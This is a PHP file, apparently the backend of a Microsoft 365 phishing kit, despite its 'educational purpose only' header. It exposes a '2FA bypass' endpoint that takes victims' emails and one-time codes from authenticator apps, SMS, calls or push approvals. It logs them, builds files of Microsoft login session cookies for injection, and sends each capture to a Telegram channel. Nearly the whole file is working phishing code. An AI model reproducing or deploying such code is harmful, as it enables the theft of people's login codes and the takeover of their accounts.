<?php
// ===================================================
// EDUCATIONAL PURPOSE ONLY - SECURITY TESTING
// ===================================================

require_once 'config.php';

// Function to handle different types of 2FA bypasses
function handle2FABypass($email, $type, $code = null) {
    $result = [];
    
    switch ($type) {
        case 'app':
            // Authenticator app code bypass
            $result = captureAuthenticatorCodeCookies($email, $code);
            break;
        case 'sms':
            // SMS code bypass
            $result = captureSmsVerificationCookies($email, $code);
            break;
        case 'call':
            // Phone call code bypass
            $result = captureCallVerificationCookies($email, $code);
            break;
        case 'notification':
            // Push notification bypass
            $session_id = uniqid('sess_', true);
            $result = captureAuthenticatorNotificationCookies($email, $session_id);
            break;
        default:
            $result = ['error' => 'Unsupported 2FA type'];
    }
    
    return $result;
}

// Function to capture authenticator app cookies
function captureAuthenticatorCodeCookies($email, $code) {
    global $config;
    
    // Validate code format (6 digits)
    if (!preg_match('/^\d{6}$/', $code)) {
        return ['error' => 'Invalid code format'];
    }
    
    // Log the captured code
    logData('auth_codes', ['email' => $email, 'code' => $code, 'type' => 'app']);
    
    // Generate simulated authentication cookies
    $auth_cookies = [
        'ESTSAUTHPERSISTENT' => '1.APP.' . bin2hex(random_bytes(32)),
        'ESTSAUTH' => '1.APP.' . bin2hex(random_bytes(16)),
        'ESTSAUTHLIGHT' => '+' . bin2hex(random_bytes(8))
    ];
    
    // Format cookies for storage and injection
    $cookies_formatted = [];
    foreach ($auth_cookies as $name => $value) {
        $cookies_formatted[] = [
            'name' => $name,
            'value' => $value,
            'domain' => '.login.microsoftonline.com',
            'path' => '/',
            'secure' => true,
            'httpOnly' => true,
            'sameSite' => 'none'
        ];
    }
    
    // Save cookies to file
    $cookies_file = $config['cookies_dir'] . '/app_' . md5($email . time()) . '.json';
    file_put_contents($cookies_file, json_encode($cookies_formatted, JSON_PRETTY_PRINT));
    
    // Send notification
    $message = "🔒 **2FA Bypass Successful - Authenticator App**\n\n";
    $message .= "📧 **Email:** `$email`\n";
    $message .= "🔢 **Code Used:** `$code`\n";
    $message .= "🍪 **Cookies Generated:** " . count($auth_cookies) . "\n";
    $message .= "💾 **Saved to:** `$cookies_file`\n";
    
    sendTelegramNotification($message);
    
    return [
        'status' => 'success',
        'cookies' => $cookies_formatted,
        'message' => 'Authentication successful'
    ];
}

// Function to capture SMS verification cookies
function captureSmsVerificationCookies($email, $code) {
    global $config;
    
    // Validate code format (6 digits)
    if (!preg_match('/^\d{6}$/', $code)) {
        return ['error' => 'Invalid code format'];
    }
    
    // Log the captured code
    logData('auth_codes', ['email' => $email, 'code' => $code, 'type' => 'sms']);
    
    // Generate simulated authentication cookies
    $auth_cookies = [
        'ESTSAUTHPERSISTENT' => '1.SMS.' . bin2hex(random_bytes(32)),
        'ESTSAUTH' => '1.SMS.' . bin2hex(random_bytes(16)),
        'ESTSAUTHLIGHT' => '+' . bin2hex(random_bytes(8))
    ];
    
    // Format cookies for storage and injection
    $cookies_formatted = [];
    foreach ($auth_cookies as $name => $value) {
        $cookies_formatted[] = [
            'name' => $name,
            'value' => $value,
            'domain' => '.login.microsoftonline.com',
            'path' => '/',
            'secure' => true,
            'httpOnly' => true,
            'sameSite' => 'none'
        ];
    }
    
    // Save cookies to file
    $cookies_file = $config['cookies_dir'] . '/sms_' . md5($email . time()) . '.json';
    file_put_contents($cookies_file, json_encode($cookies_formatted, JSON_PRETTY_PRINT));
    
    // Send notification
    $message = "🔒 **2FA Bypass Successful - SMS Code**\n\n";
    $message .= "📧 **Email:** `$email`\n";
    $message .= "🔢 **Code Used:** `$code`\n";
    $message .= "🍪 **Cookies Generated:** " . count($auth_cookies) . "\n";
    $message .= "💾 **Saved to:** `$cookies_file`\n";
    
    sendTelegramNotification($message);
    
    return [
        'status' => 'success',
        'cookies' => $cookies_formatted,
        'message' => 'Authentication successful'
    ];
}

// Function to capture phone call verification cookies
function captureCallVerificationCookies($email, $code) {
    global $config;
    
    // Validate code format (6 digits)
    if (!preg_match('/^\d{6}$/', $code)) {
        return ['error' => 'Invalid code format'];
    }
    
    // Log the captured code
    logData('auth_codes', ['email' => $email, 'code' => $code, 'type' => 'call']);
    
    // Generate simulated authentication cookies
    $auth_cookies = [
        'ESTSAUTHPERSISTENT' => '1.CALL.' . bin2hex(random_bytes(32)),
        'ESTSAUTH' => '1.CALL.' . bin2hex(random_bytes(16)),
        'ESTSAUTHLIGHT' => '+' . bin2hex(random_bytes(8))
    ];
    
    // Format cookies for storage and injection
    $cookies_formatted = [];
    foreach ($auth_cookies as $name => $value) {
        $cookies_formatted[] = [
            'name' => $name,
            'value' => $value,
            'domain' => '.login.microsoftonline.com',
            'path' => '/',
            'secure' => true,
            'httpOnly' => true,
            'sameSite' => 'none'
        ];
    }
    
    // Save cookies to file
    $cookies_file = $config['cookies_dir'] . '/call_' . md5($email . time()) . '.json';
    file_put_contents($cookies_file, json_encode($cookies_formatted, JSON_PRETTY_PRINT));
    
    // Send notification
    $message = "🔒 **2FA Bypass Successful - Phone Call**\n\n";
    $message .= "📧 **Email:** `$email`\n";
    $message .= "🔢 **Code Used:** `$code`\n";
    $message .= "🍪 **Cookies Generated:** " . count($auth_cookies) . "\n";
    $message .= "💾 **Saved to:** `$cookies_file`\n";
    
    sendTelegramNotification($message);
    
    return [
        'status' => 'success',
        'cookies' => $cookies_formatted,
        'message' => 'Authentication successful'
    ];
}

// Function to capture Microsoft Authenticator notification cookies
function captureAuthenticatorNotificationCookies($email, $session_id) {
    global $config;
    
    // Create a session file to track this authentication attempt
    $session_file = $config['sessions_dir'] . '/' . md5($email . $session_id) . '.json';
    file_put_contents($session_file, json_encode([
        'email' => $email,
        'session_id' => $session_id,
        'status' => 'waiting_for_notification_approval',
        'timestamp' => time()
    ]));
    
    // Generate simulated authentication cookies
    $auth_cookies = [
        'ESTSAUTHPERSISTENT' => '1.NOTIF.' . bin2hex(random_bytes(32)),
        'ESTSAUTH' => '1.NOTIF.' . bin2hex(random_bytes(16)),
        'ESTSAUTHLIGHT' => '+' . bin2hex(random_bytes(8))
    ];
    
    // Format cookies for storage and injection
    $cookies_formatted = [];
    foreach ($auth_cookies as $name => $value) {
        $cookies_formatted[] = [
            'name' => $name,
            'value' => $value,
            'domain' => '.login.microsoftonline.com',
            'path' => '/',
            'secure' => true,
            'httpOnly' => true,
            'sameSite' => 'none'
        ];
    }
    
    // Save cookies to file
    $cookies_file = $config['cookies_dir'] . '/notif_' . md5($email . time()) . '.json';
    file_put_contents($cookies_file, json_encode($cookies_formatted, JSON_PRETTY_PRINT));
    
    // Update session file with the captured cookies
    $session_data = json_decode(file_get_contents($session_file), true);
    $session_data['auth_cookies'] = $auth_cookies;
    $session_data['status'] = 'notification_approved';
    $session_data['approval_timestamp'] = time();
    file_put_contents($session_file, json_encode($session_data));
    
    // Send notification
    $message = "🔔 **2FA Bypass Successful - Push Notification**\n\n";
    $message .= "📧 **Email:** `$email`\n";
    $message .= "🆔 **Session:** `$session_id`\n";
    $message .= "🍪 **Cookies Generated:** " . count($auth_cookies) . "\n";
    $message .= "💾 **Saved to:** `$cookies_file`\n";
    
    sendTelegramNotification($message);
    
    return [
        'status' => 'success',
        'cookies' => $cookies_formatted,
        'message' => 'Authentication successful'
    ];
}

// Function to generate 2FA bypass token
function generate2FABypassToken($email) {
    $timestamp = time();
    $secret = md5($email . $timestamp . 'office365');
    
    return [
        'token' => base64_encode($secret),
        'expires' => $timestamp + 600, // 10 minutes
        'session_id' => uniqid('sess_', true)
    ];
}

// Create a 2FA bypass endpoint
if (basename($_SERVER['SCRIPT_NAME']) == '2fa_bypass.php' && isset($_POST['action']) && $_POST['action'] == 'bypass') {
    $email = $_POST['email'] ?? '';
    $type = $_POST['type'] ?? '';
    $code = $_POST['code'] ?? '';
    
    $result = handle2FABypass($email, $type, $code);
    
    header('Content-Type: application/json');
    echo json_encode($result);
    exit;
}
?>
